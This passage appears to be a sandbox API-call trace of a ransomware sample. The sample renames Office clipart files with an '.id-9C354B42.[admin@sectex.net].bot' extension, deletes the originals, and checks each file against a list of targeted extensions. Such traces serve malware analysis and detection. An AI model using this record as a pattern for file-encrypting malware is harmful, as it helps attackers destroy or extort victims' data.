	[0163.081] CloseHandle (hObject=0x1b4) returned 1
	[0163.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf")) returned 0x20
	[0163.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.081] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.081] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.082] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.082] GetLastError () returned 0x0
	[0163.082] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1b68, lpOverlapped=0x0) returned 1
	[0163.084] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1b70, lpOverlapped=0x0) returned 1
	[0163.085] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.085] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.085] SetEndOfFile (hFile=0x37c) returned 1
	[0163.086] CloseHandle (hObject=0x37c) returned 1
	[0163.086] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.086] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.090] CloseHandle (hObject=0x1b4) returned 1
	[0163.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.091] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107724.wmf")) returned 1
	[0163.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.091] lstrlenW (lpString=".doc") returned 4
	[0163.091] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.091] lstrlenW (lpString=".docx") returned 5
	[0163.091] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.091] lstrlenW (lpString=".pdf") returned 4
	[0163.091] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.091] lstrlenW (lpString=".xls") returned 4
	[0163.091] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.091] lstrlenW (lpString=".xlsx") returned 5
	[0163.091] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.092] lstrlenW (lpString=".ppt") returned 4
	[0163.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.092] lstrlenW (lpString=".zip") returned 4
	[0163.092] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.092] lstrlenW (lpString=".rar") returned 4
	[0163.092] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString=".bz2") returned 4
	[0163.092] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString=".7z") returned 3
	[0163.092] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.092] lstrlenW (lpString=".dbf") returned 4
	[0163.092] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.092] lstrlenW (lpString=".1cd") returned 4
	[0163.092] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.092] lstrlenW (lpString=".jpg") returned 4
	[0163.092] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.092] lstrlenW (lpString=".doc") returned 4
	[0163.092] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString=".docx") returned 5
	[0163.092] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0163.092] lstrlenW (lpString=".pdf") returned 4
	[0163.092] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.092] lstrlenW (lpString=".xls") returned 4
	[0163.092] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.092] lstrlenW (lpString=".xlsx") returned 5
	[0163.092] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0163.092] lstrlenW (lpString=".ppt") returned 4
	[0163.092] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.093] lstrlenW (lpString=".zip") returned 4
	[0163.093] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.093] lstrlenW (lpString=".rar") returned 4
	[0163.093] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.093] lstrlenW (lpString=".bz2") returned 4
	[0163.093] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.093] lstrlenW (lpString=".7z") returned 3
	[0163.093] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.093] lstrlenW (lpString=".dbf") returned 4
	[0163.093] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.093] lstrlenW (lpString=".1cd") returned 4
	[0163.093] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107724.WMF") returned 63
	[0163.093] lstrlenW (lpString=".jpg") returned 4
	[0163.093] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.093] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.093] lstrlenW (lpString="J0107728.WMF") returned 12
	[0163.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.094] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=5492) returned 1
	[0163.094] CloseHandle (hObject=0x1b4) returned 1
	[0163.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf")) returned 0x20
	[0163.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.094] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.094] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.095] GetLastError () returned 0x0
	[0163.095] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x1574, lpOverlapped=0x0) returned 1
	[0163.096] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x1580, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x1580, lpOverlapped=0x0) returned 1
	[0163.097] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.097] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.098] SetEndOfFile (hFile=0x37c) returned 1
	[0163.098] CloseHandle (hObject=0x37c) returned 1
	[0163.098] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.098] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.101] CloseHandle (hObject=0x1b4) returned 1
	[0163.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.102] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107728.wmf")) returned 1
	[0163.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.102] lstrlenW (lpString=".doc") returned 4
	[0163.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.102] lstrlenW (lpString=".docx") returned 5
	[0163.102] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.102] lstrlenW (lpString=".pdf") returned 4
	[0163.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString=".xls") returned 4
	[0163.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.103] lstrlenW (lpString=".xlsx") returned 5
	[0163.103] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.103] lstrlenW (lpString=".ppt") returned 4
	[0163.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.103] lstrlenW (lpString=".zip") returned 4
	[0163.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.103] lstrlenW (lpString=".rar") returned 4
	[0163.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString=".bz2") returned 4
	[0163.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString=".7z") returned 3
	[0163.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.103] lstrlenW (lpString=".dbf") returned 4
	[0163.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.103] lstrlenW (lpString=".1cd") returned 4
	[0163.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.103] lstrlenW (lpString=".jpg") returned 4
	[0163.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.103] lstrlenW (lpString=".doc") returned 4
	[0163.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString=".docx") returned 5
	[0163.103] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0163.103] lstrlenW (lpString=".pdf") returned 4
	[0163.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.103] lstrlenW (lpString=".xls") returned 4
	[0163.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.104] lstrlenW (lpString=".xlsx") returned 5
	[0163.104] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0163.104] lstrlenW (lpString=".ppt") returned 4
	[0163.104] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.104] lstrlenW (lpString=".zip") returned 4
	[0163.104] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.104] lstrlenW (lpString=".rar") returned 4
	[0163.104] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.104] lstrlenW (lpString=".bz2") returned 4
	[0163.104] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.104] lstrlenW (lpString=".7z") returned 3
	[0163.104] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.104] lstrlenW (lpString=".dbf") returned 4
	[0163.104] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.104] lstrlenW (lpString=".1cd") returned 4
	[0163.104] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.104] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107728.WMF") returned 63
	[0163.104] lstrlenW (lpString=".jpg") returned 4
	[0163.104] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.104] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.104] lstrlenW (lpString="J0107730.WMF") returned 12
	[0163.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.106] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3060) returned 1
	[0163.106] CloseHandle (hObject=0x1b4) returned 1
	[0163.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf")) returned 0x20
	[0163.106] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.106] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.106] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.107] GetLastError () returned 0x0
	[0163.107] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0xbf4, lpOverlapped=0x0) returned 1
	[0163.108] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xc00, lpOverlapped=0x0) returned 1
	[0163.109] ReadFile (in: hFile=0x1b4, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.109] WriteFile (in: hFile=0x37c, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.109] SetEndOfFile (hFile=0x37c) returned 1
	[0163.109] CloseHandle (hObject=0x37c) returned 1
	[0163.109] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.110] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.111] CloseHandle (hObject=0x1b4) returned 1
	[0163.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.112] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107730.wmf")) returned 1
	[0163.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.112] lstrlenW (lpString=".doc") returned 4
	[0163.112] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.112] lstrlenW (lpString=".docx") returned 5
	[0163.112] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0163.112] lstrlenW (lpString=".pdf") returned 4
	[0163.113] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString=".xls") returned 4
	[0163.113] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.113] lstrlenW (lpString=".xlsx") returned 5
	[0163.113] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0163.113] lstrlenW (lpString=".ppt") returned 4
	[0163.113] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.113] lstrlenW (lpString=".zip") returned 4
	[0163.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.113] lstrlenW (lpString=".rar") returned 4
	[0163.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString=".bz2") returned 4
	[0163.113] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString=".7z") returned 3
	[0163.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.113] lstrlenW (lpString=".dbf") returned 4
	[0163.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.113] lstrlenW (lpString=".1cd") returned 4
	[0163.113] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.113] lstrlenW (lpString=".jpg") returned 4
	[0163.113] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.113] lstrlenW (lpString=".doc") returned 4
	[0163.113] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString=".docx") returned 5
	[0163.113] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0163.113] lstrlenW (lpString=".pdf") returned 4
	[0163.113] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0163.113] lstrlenW (lpString=".xls") returned 4
	[0163.114] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0163.114] lstrlenW (lpString=".xlsx") returned 5
	[0163.114] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0163.114] lstrlenW (lpString=".ppt") returned 4
	[0163.114] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0163.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.114] lstrlenW (lpString=".zip") returned 4
	[0163.114] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0163.114] lstrlenW (lpString=".rar") returned 4
	[0163.114] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0163.114] lstrlenW (lpString=".bz2") returned 4
	[0163.114] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0163.114] lstrlenW (lpString=".7z") returned 3
	[0163.114] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0163.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.114] lstrlenW (lpString=".dbf") returned 4
	[0163.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0163.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.114] lstrlenW (lpString=".1cd") returned 4
	[0163.114] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0163.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107730.WMF") returned 63
	[0163.114] lstrlenW (lpString=".jpg") returned 4
	[0163.114] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0163.114] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0163.114] lstrlenW (lpString="J0107734.WMF") returned 12
	[0163.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0163.115] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=3140) returned 1
	[0163.115] CloseHandle (hObject=0x1b4) returned 1
	[0163.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107734.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107734.wmf")) returned 0x20
